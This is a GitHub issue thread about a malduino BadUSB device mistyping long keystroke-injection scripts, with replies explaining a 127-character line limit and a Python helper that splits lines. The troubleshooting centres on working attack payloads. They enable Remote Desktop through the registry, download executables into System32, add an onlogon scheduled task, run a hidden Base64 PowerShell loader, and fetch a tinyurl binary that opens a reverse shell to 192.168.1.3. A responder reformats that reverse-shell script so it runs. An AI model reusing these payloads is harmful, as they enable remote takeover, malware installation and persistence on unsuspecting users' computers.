Seytonic / malduino

All the Malduinos!


Malduino Elite not entering in ENTER or some STRING lines properly

ll3N1GmAll opened this issue · comments

Most of my scripts are not functioning as they do on the Bunny and Ducky platforms. I am seeing duplicate string sections entered where they don't exist in the script, and other keys, such as ENTER, not being inserted properly. Example:
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
DELAY 200
ENTER
DELAY 3000
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
DELAY 200
ENTER
DELAY 3000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.exe')
DELAY 200
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.exe')
DELAY 200
ENTER
STRING %WINDIR%\System32\payload.exe -i -d -s /accepteula %WINDIR%\System32\payload2.exe
DELAY 200
ENTER
STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

This section should output the following in a notepad:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
powershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.exe')
powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.exe')
%WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\payload.exe
schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

HOWEVER, this is what it outputs consistently:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fDenyTSConnectionsreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /fAllowToGetHelppowershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.ex
powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.
%WINDIR%\System32\payload2.exe -i -d -s /accepteula %WINDIR%\System32\payload.exeschtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

Some of this behavior seems similar to the bashbunny firmware bug that caused issues with strings that ended in .TXT. For some reason that threw the device into a bizarre fit. These oddities feel very similar to that type of thing.

Here is another example (actual payload text removed):
GUI r
DELAY 5000
STRING cmd
DELAY 200
ENTER
DELAY 5000
STRING if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("")))), [IO.Compression.CompressionMode]::Decompress)), [STRING.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("<BASE64PAYLOAD_64bit>")))), [IO.Compression.CompressionMode]::Decompress)), [STRING.Encoding]::ASCII)).ReadToEnd();")
DELAY 200
ENTER

This is the output:
cmd
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamR
")

So, it types "cmd" then injects ENTER. Then it starts to type until it gets to ""Invoke-Expression $(New-Object IO.StreamR")". Then it goes back 2 spaces to the left of ") and then injects an ENTER, which drops the ") down to the next line, and the payload never progresses beyond this point.

I have a similar payload, but that one opens up an admin prompt for an admin shell. It stops at the exact same place and performs the identical move of the cursor back 2 places and then injects ENTER before the script stops entirely.

Please try to split your STRING into multiple STRING lines, because the maximum number of chars in a line is 256.
Example:
GUI r
STRING cmd
ENTER
STRING Hello
STRING My
STRING Name
STRING is
ENTER

All of these STRINGs will be written on one line.

The first payload has no lines near 256 characters and it is still behaving in the manner described in my first post. It is acting as though it is possessed. I'm thinking that there is some character or character combination that is causing it to respond in a buggy way like the bashbunny issue on firmwares <1.4 with strings that ended in .TXT

Please try to change the "#define buffersize 256" to "#define buffersize 128" and shorten your lines to 127 chars per line.

This is the code i have:
DELAY 1000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
DELAY 500
ENTER
DELAY 500
STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit
ENTER

Notepad:
cmd
cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPoliy
START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit

What should I do? Malduino doesn't write all letters...

@Nibot1 Can anyone here tell me why malduino sometimes writes the string ok and sometimes not?

@GreenSales
You must place a STRING command in front of every line with the string which should be typed.
Example:
STRING hello
STRING World

Will get **hello World** written without a line break.
And remember each line can only hold 127 chars including spaces.

Try This Code
DELAY 1000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1
STRING & powershell -ExecutionPolicy ByPass -File b.ps1
DELAY 500
ENTER
DELAY 500
STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit
ENTER
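The line-length limit explained in the two replies above (buffersize 128, so 127 characters per line including the command keyword and spaces, and consecutive STRING lines typed back to back) as an added example. This is not malduino's own code: it models a fixed-size line buffer to show why over-long lines lose characters, flags offending lines, and splits them the way the replies recommend. The sample script, the PREFIX/LONG_TEXT names and the whitespace-handling choice are assumptions made for the example.

```python
# Added example (not malduino's own code): models the per-line buffer limit
# discussed in this thread and splits over-long STRING lines the way the
# replies recommend. The sample script below is constructed for illustration.
BUFFERSIZE = 128            # "#define buffersize 128" from the thread
MAX_LINE = BUFFERSIZE - 1   # 127 usable characters; one byte for the terminator
PREFIX = "STRING "

def read_line_into_buffer(line, buffersize=BUFFERSIZE):
    """Model of a fixed-size line buffer (assumption about the firmware):
    only the first buffersize-1 characters survive; the rest is lost or
    mis-parsed, which matches the truncated notepad output in the thread."""
    return line[:buffersize - 1]

def check_script(script, max_line=MAX_LINE):
    """Return (line_number, length) for every line longer than max_line,
    counting the command keyword and all spaces, as the thread states."""
    return [(n, len(line)) for n, line in enumerate(script.splitlines(), 1)
            if len(line) > max_line]

def split_string_line(line, max_line=MAX_LINE):
    """Split one over-long 'STRING ...' line into several STRING lines that
    each fit. Consecutive STRING lines are typed back to back with no line
    break, so the chunks reassemble the original text. Cuts are moved so no
    chunk starts with a space (how the parser treats leading whitespace is
    not stated in the thread, so this avoids relying on it)."""
    if not line.startswith(PREFIX) or len(line) <= max_line:
        return [line]
    text, room, chunks = line[len(PREFIX):], max_line - len(PREFIX), []
    while len(text) > room:
        cut = room
        while cut > 1 and text[cut] == " ":
            cut -= 1
        chunks.append(PREFIX + text[:cut])
        text = text[cut:]
    chunks.append(PREFIX + text)
    return chunks

def fix_script(script, max_line=MAX_LINE):
    """Rewrite a whole script so every line fits the buffer."""
    out = []
    for line in script.splitlines():
        out.extend(split_string_line(line, max_line))
    return "\n".join(out)

# Constructed sample: a benign 187-character STRING line (limit is 127).
LONG_TEXT = "The quick brown fox jumps over the lazy dog. " * 4
SAMPLE_SCRIPT = "\n".join([
    "GUI r", "DELAY 500", "STRING notepad", "ENTER", "DELAY 1000",
    PREFIX + LONG_TEXT, "ENTER",
])

if __name__ == "__main__":
    print(check_script(SAMPLE_SCRIPT))          # [(6, 187)]
    print(fix_script(SAMPLE_SCRIPT))
```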

Is this issue solved?

Well, with that string, yes. But always after I start up my PC a script is written wrong, and after I replug the USB everything is all right. I can't see why that happens.

I will try to implement your proposed fix and modifications to my payloads tonight and reply back with results. Thank you for your response.

Looking at my #define buffersize attribute it was already set to 128; but I didn't change it. I will reformat the payloads accordingly and report back. Thanks for your help!

With buffersize set at 128 and all lines set at 127 chars total or less is working. Thanks!

@ll3N1GmAll
Is this issue solved?
If yes please close the issue.

Yes, this issue is resolved. I explained that in my response 13 days ago, but was not aware that I needed to close this (or even that I could close it). I apologize for my ignorance. I now see the "close and comment" button I overlooked last time. Closing now, thanks so much for your help. This has made my malduino everything I had hoped it would be! :)